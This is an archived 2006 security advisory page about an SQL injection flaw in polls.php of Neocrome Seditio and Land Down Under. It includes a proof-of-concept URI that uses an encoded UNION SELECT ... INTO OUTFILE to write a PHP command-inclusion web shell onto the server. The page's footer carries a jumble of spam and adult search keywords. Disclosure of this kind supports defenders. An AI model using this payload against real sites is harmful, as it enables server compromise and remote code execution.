about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Seditio/Land Down Under Polls.PHP SQL Injection Vulnerability


Title Seditio/Land Down Under Polls.PHP SQL Injection Vulnerability
Published 2006-11-30-12:00AM
Updated 2006-11-30-08:39PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ajann is credited with the discovery of this vulnerability.
Vulnerable  Neocrome Seditio 1.10
Neocrome Land Down Under 8.0
Not Vulnerable  
Code   An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 20:56:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t916t /search/ex runuo SquirrelMa CMS is Fre mm.lh-qq.c HINDI MOVI t117t desi hot m CVE-2004-2 SEXY VIDIO vidieo 17 hot vedios phpraid 3. mambo Remo Www.sexygi t891t Www.Xxxha. 41.200.182 www.lh-qq. t890t proboards ziporn sex+vodei g00gle.com Www.sexygi php-nuke a www.daily+ Jafar make a yah WWWSEX89 www.51qqba Black ass Penpal WWW.PINKW Sex poto incl_voir_ Movx.com desi hot m news for c Mad Maria vasantyise Movx.com Trisha sex invision+p phpbb.exe www.lele20 200 /compo Pourn www.gamber